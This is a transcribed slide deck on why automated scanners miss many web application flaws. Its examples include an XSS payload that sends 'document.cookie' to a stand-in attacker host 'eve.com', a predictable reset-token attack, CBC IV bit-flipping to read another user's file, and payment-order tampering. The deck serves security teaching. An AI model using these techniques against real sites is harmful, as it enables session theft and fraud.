security testing where automation fails today
play

Security Testing - Where Automation Fails Today How does security - PowerPoint PPT Presentation

Nov 15, 2023 •23 likes •583 views

Security Testing - Where Automation Fails Today How does security testing of web applications work What does the tooling landscape look like How does automated security testing fail What can we do Image courtesy of

  1. Security Testing - Where Automation Fails

  2. Today • How does security testing of web applications work • What does the tooling landscape look like • How does automated security testing fail • What can we do Image courtesy of http://theverybesttop10.com/funny-bad-security-fails/

  3. Hi Christiaan Ottow • Developer, Sysop, Hacker • Security Coach @ Computest / Pine Digital Security • cottow@computest.nl • @cottow Image courtesy of https://ospois.wordpress.com/2008/11/13/

  5. Image courtesy of http://matrix.wikia.com/wiki/The_Matrix_Revolutions Image courtesy of http://knowyourmeme.com/memes/ fi rst-day-on-the-internet-kid

  6. Image courtesy of http://www.opensamm.org/

  7. Image courtesy of https://www.microsoft.com/en-us/sdl/process/veri fi cation.aspx

  8. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  9. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  10. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  11. See https://www.certi fi edsecure.com/checklists/

  13. Message to John ATTACKER Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cook FriendFace website ie; </script> how are you? Message from Kevin <html> <body> VICTIM <p>Message from Eve:</p> <p>Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cookie;</script> how are you? </p> </body> </html>

  14. Image courtesy of Acunetix

  15. <?php $name = $_GET[‘name’]; echo “Welcome, $name!” http://test.site/welcome.php?name=<script>

  16. <?php $name = $_GET[‘name’]; echo “Welcome, $name!” http://test.site/welcome.php?name=<script> Welcome, <script>!

  17. <?php $name = htmlspecialchars($_GET[‘name’]); echo “Welcome, $name!” http://test.site/welcome.php?name=<script>

  18. <?php $name = htmlspecialchars($_GET[‘name’]); echo “Welcome, $name!” http://test.site/welcome.php?name=<script> Welcome, &lt;script&gt;!

  19. Image courtesy of http://theverybesttop10.com/funny-bad-security-fails/

  20. Penetration testing cannot prove or even demonstrate that a system is flawless. It can place a reasonable bound on the knowledge and work factor required for a penetrator to succeed. - Smart Guy on the Internet [..] penetration testing cannot prove security of the system, just as no doctor can prove that you are without occult disease; thus, it can just prove that the system is vulnerable. - Other Smart Guy on the Internet

  22. Image courtesy of https://www.microsoft.com/en-us/sdl/process/veri fi cation.aspx

  23. Vulnerability SAST scanner DAST scanner scanner HTTP HTTP, TCP/IP Orchestration <?php include(“header. php”); echo “Hello, world!”; <?php include(“header.php”); Acceptance Production <?php <?php Repository include(“header. include(“header. echo “Hello, world!”; php”); php”); infra infra echo “Hello, echo “Hello, world!”; world!”;

  24. SAST DAST • HP Fortify • Nessus • Checkmarx • Burp Suite • Veracode • Acunetix • Coverity • Qualys WAS • IBM AppScan Source • Netsparker • IBM AppScan

  25. + • Injection testing • SQL, XSS, LDAP, XML, LFI, … • Session handling • CSRF, session regeneration and invalidation, cookie settings, .. • Hardening • Use of SSL and certi fi cate settings, best practices for HTTP headers, extraneous content, … • Infrastructure testing • Open ports, old versions, weak auth methods, known vulns, …

  26. - • Business rules bypass • Unintended state transitions, … • Authorization checking • Predictable tokens / IDs, ID-based authorization, … • Incorrect use of crypto and RNGs • Sign but don’t verify, weak random numbers, AES ECB mode, CBC with public IV, … • System interoperation

  29. € 5,005 ?

  32. https://jira.company.nl/reset/a9bfea171aaf723728939ccd6c67f0e8e59f11de

  33. https://jira.company.nl/reset/a9bfea171aaf723728939ccd6c67f0e8e59f11de sha1(“cottow@company.nl”) = a9bfea171aaf723728939ccd6c67f0e8e59f11de

  34. sha1(“ceo@company.nl”) = 9f26486b094bcc6c1838b42da2eb48f6635f2f84

  35. sha1(“ceo@company.nl”) = 9f26486b094bcc6c1838b42da2eb48f6635f2f84 https://jira.company.nl/reset/9f26486b094bcc6c1838b42da2eb48f6635f2f84

  36. <?php // get params $fname = $_GET['filename']; $iv = $_GET['iv']; // setup crypto $ch = mcrypt_module_open(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC, ''); mcrypt_generic_init($ch, $key, $iv); // open file $fp = fopen(mcrypt_generic($ch, $fname), 'r'); fpassthru($fp);

  38. 10100101 ^ 11101010 = 01001111

  39. decrypted = “/home/john/secret.txt" iv = "\x00\x00\x00\x00\x00\x00\x07\x0e\x1a \x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00" decrypted ^ iv = "/home/mark/secret.txt"

  40. <script>alert(document.cookie);</script>

  42. Blog comment ATTACKER Nice blog! <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cook ie; Wordpress frontend </script> Database Nice blog! <script>var i = new Image(); img.src = ‘http:// eve.com/'+doc ument.cookie; </script> List of comments <html> Nice blog! <script>var i = new <body> Image(); VICTIM img.src = ‘http:// <p>Comments:</p> eve.com/'+doc ument.cookie; </script> <p>Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cookie;</script> Wordpress admin site how are you? </p> </body> </html>

  44. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  45. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  46. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  47. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  48. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1336&Lang=NL

  50. Image courtesy of http://9gag.com/gag/3699936/son-i-am-derp

  53. Vulnerability SAST scanner DAST scanner scanner HTTP HTTP, TCP/IP Orchestration <?php include(“header. php”); echo “Hello, world!”; <?php include(“header.php”); Acceptance Production <?php <?php Repository include(“header. include(“header. echo “Hello, world!”; php”); php”); infra infra echo “Hello, echo “Hello, world!”; world!”;

  54. Image courtesy of http://www.qahipster.com/blog/what-is-unit-testing-part-1-of-2

  55. Summary • Security testing is a distinct expertise • Tools can only do part of the testing • Make sure you have the right expertise in your team or enlist help • Make use of the overlap between security- and functional testing Image courtesy of https://memegenerator.net/That-Would-Be-Great

  56. Image courtesy of http://www.slideshare.net/linaroorg/sfo15tr6-server-ecosystem-day-part-6a

Recommend

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS Few Security Breaches Date: 2013-14 September 2016, while in negotiations to

404 views • 18 slides
Automate Security Testing and System Compliance Agenda Introduction to SCAP Introduction

Automate Security Testing and System Compliance Agenda Introduction to SCAP Introduction

Automate Security Testing and System Compliance Agenda Introduction to SCAP Introduction to STIG SUSE STIG Automation Demo Time Whats next? What is SCAP? The Security Content Automation Protocol is a multi-purpose

684 views • 37 slides
WiF iFi security UW Madison CS 642 1 Announcements HW 3 (network security) out today

WiF iFi security UW Madison CS 642 1 Announcements HW 3 (network security) out today

WiF iFi security UW Madison CS 642 1 Announcements HW 3 (network security) out today Due April 2 nd Online classes going forward Testing out BBCollaborate Ultra today Recordings should be available Might use different

1.19k views • 27 slides
6 Years of Test Automation @mikeb2701 Assumptions Testing is important Automating

6 Years of Test Automation @mikeb2701 Assumptions Testing is important Automating

6 Years of Test Automation @mikeb2701 Assumptions Testing is important Automating testing is important Types of tests Static Analysis Unit Testing Integration Testing Acceptance Testing Performance Testing

619 views • 33 slides
I nsert the title of your GATEw ay project and UK-funded activities on autom ated vehicles

I nsert the title of your GATEw ay project and UK-funded activities on autom ated vehicles

TRL Self-driving car, 1960s Testing partial automation, TRL, 2000s Testing in GATEway, Greenwich, 2015 TRL Self-driving car and bus, 1970 Future testing, Greenwich, 2017+? Testing automation in DigiCar, TRL, 2010s I nsert the title of your

312 views • 30 slides
Security Testing Checking for what shouldnt happen Azqa Nadeem PhD Student @ Cyber Security

Security Testing Checking for what shouldnt happen Azqa Nadeem PhD Student @ Cyber Security

Security Testing Checking for what shouldnt happen Azqa Nadeem PhD Student @ Cyber Security Group The Cyber Security lecture series 1 Agenda for today Part I Latest security news Security vulnerabilities in Java

2.02k views • 185 slides
Cyber Security in Mining Automation Ragnar Schierholz, Head of Cyber Security, Industrial

Cyber Security in Mining Automation Ragnar Schierholz, Head of Cyber Security, Industrial

ABB MINING USER CONFERENCE, MAY 02-05, 2017 Cyber Security in Mining Automation Ragnar Schierholz, Head of Cyber Security, Industrial Automation Division Agenda Why worry about cyber security? ABBs approach to cyber security Cyber security

1.07k views • 39 slides
1 Automation Overview Definition Automation (automation, Automation ) : 1) set of all measures

1 Automation Overview Definition Automation (automation, Automation ) : 1) set of all measures

Industrial Automation Spring 2019, EPFL 1 Automation Overview Definition Automation (automation, Automation ) : 1) set of all measures aiming at replacing human work through machines (e.g. automation is applied science) 2) the

1.39k views • 63 slides
Dynamic Security Testing Sicco Verwer s.e.verwer@tudelft.nl 1 Challenge the future Today

Dynamic Security Testing Sicco Verwer s.e.verwer@tudelft.nl 1 Challenge the future Today

Dynamic Security Testing Sicco Verwer s.e.verwer@tudelft.nl 1 Challenge the future Today The world of software security How is it possible? Integer overflows Buffer overflows Heartbleed Stagefright How can it be

1.58k views • 129 slides
Security Automation and Optimization using HP-NA Florian Ecard SNE master student Supervisor:

Security Automation and Optimization using HP-NA Florian Ecard SNE master student Supervisor:

Security Automation and Optimization using HP-NA Florian Ecard SNE master student Supervisor: Olivier Willm 4 th February 2015 Security Automation and Optimization using HP-NA - What is HP Network Automation? - What were the objectives with

483 views • 13 slides
Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E.

Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E.

Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E. Simos SBA Research Applied &amp; Computational Mathematics Division Seminar Series National Institute of Standards and Technology (NIST) Gaithersburg,

675 views • 50 slides
Evolution of Test Automation State Driven Testing Jan De Coster November, 2011 Why test

Evolution of Test Automation State Driven Testing Jan De Coster November, 2011 Why test

Evolution of Test Automation State Driven Testing Jan De Coster November, 2011 Why test automation? Use computers to replace expensive manual testing Cant do it all manually Coverage of functionality Coverage of platforms

613 views • 20 slides
Been testing software for over 10 years Started out as a Manual Tester Moved to Automation

Been testing software for over 10 years Started out as a Manual Tester Moved to Automation

Been testing software for over 10 years Started out as a Manual Tester Moved to Automation testing Now leading teams, defining quality in organizations. Started as a reflection of how much software testing has changed over the last decade 1

779 views • 40 slides
Security Testing TDDC90 Software Security Ulf Kargn Department of Computer and Information

Security Testing TDDC90 Software Security Ulf Kargn Department of Computer and Information

Security Testing TDDC90 Software Security Ulf Kargn Department of Computer and Information Science (IDA) Division for Database and Information Techniques (ADIT) Security testing vs regular testing Regular testing aims to

1.06k views • 54 slides
Testing Today we are going to talk about testing. Before you all lapse into comas in

Testing Today we are going to talk about testing. Before you all lapse into comas in

Testing Today we are going to talk about testing. Before you all lapse into comas in anticipation of how exciting this lecture will be, let me say that testing actually is kind of interesting. I cant say that Im an expert, but it seems

541 views • 19 slides
AI and Machine Learning for Testers Jason Arbon, CEO @Appdiff Relevant Context Testing Neural

AI and Machine Learning for Testers Jason Arbon, CEO @Appdiff Relevant Context Testing Neural

AI and Machine Learning for Testers Jason Arbon, CEO @Appdiff Relevant Context Testing Neural Net Ranker Personalized Web Search and Chrome Test Automation AI for Mobile Test Automation Ai for Test 2 Automation Agenda AI For Testing

645 views • 36 slides
TESTING FRAMEWORKS Gayatri Ghanakota OUTLINE Introduction to Software Test Automation.

TESTING FRAMEWORKS Gayatri Ghanakota OUTLINE Introduction to Software Test Automation.

TESTING FRAMEWORKS Gayatri Ghanakota OUTLINE Introduction to Software Test Automation. What is Test Automation. Where does Test Automation fit in the software life cycle. Why do we need test automation. Test Automation using

685 views • 37 slides
Testing Your Metal Magenic @pgrizzaffi Who Is this Guy?

Testing Your Metal Magenic @pgrizzaffi Who Is this Guy?

4/26/18 Testing Your Metal Magenic @pgrizzaffi Who Is this Guy? Principal Automation Architect at Magenic Software Pediatrician Career focused on automation

694 views • 12 slides
Home Security and Automation On The Road And At Home Eric McHenry (#2242) Region 12 // Greater

Home Security and Automation On The Road And At Home Eric McHenry (#2242) Region 12 // Greater

Home Security and Automation On The Road And At Home Eric McHenry (#2242) Region 12 // Greater Bay Area Airstream Club eric.mchenry@airstreamclub.net Topics Security and automation objectives Traditional vs. emerging home security and

594 views • 31 slides
Test automation Building automatically repeatable test suites Test automation n Test automation

Test automation Building automatically repeatable test suites Test automation n Test automation

Test automation Building automatically repeatable test suites Test automation n Test automation is software that automates any aspect of testing TA2 Test automation 2 n Test automation is software that automates any aspect of testing n

397 views • 24 slides
Metasploitation H D Moore Director of Security Research (Exploit automation and IPS evasion)

Metasploitation H D Moore Director of Security Research (Exploit automation and IPS evasion)

Metasploitation H D Moore Director of Security Research (Exploit automation and IPS evasion) BreakingPoint Systems CanSecWest 2006 Agenda Introduction Metasploit 3 Automation IPS Evasion Examples 2 Introductions - Who?

675 views • 28 slides
Continuous Application Security Testing Presented by:

Continuous Application Security Testing Presented by:

W14 Security Testing Wednesday, October 23rd, 2019 3:00 PM Continuous Application Security Testing Presented by: Josh Gibbs

306 views • 4 slides
(Automated) So Soft ftware T Testing ng (Automation) Maurcio Aniche

(Automated) So Soft ftware T Testing ng (Automation) Maurcio Aniche

(Automated) So Soft ftware T Testing ng (Automation) Maurcio Aniche M.FinavaroAniche@tudelft.nl Roman Numerals Given a string in a roman numeral format, the program needs to convert it to an integer. I=1, V=5, X=10, L=50, C=100,

742 views • 25 slides
Automation For Mobile Application Testing Agenda Know The Challenges Approach App Know The

Automation For Mobile Application Testing Agenda Know The Challenges Approach App Know The

Automation For Mobile Application Testing Agenda Know The Challenges Approach App Know The App Type of Application: Native, WebApp or Hybrid. Roadmap for the application. Intended audience. Green platforms and devices.

289 views • 15 slides

More recommend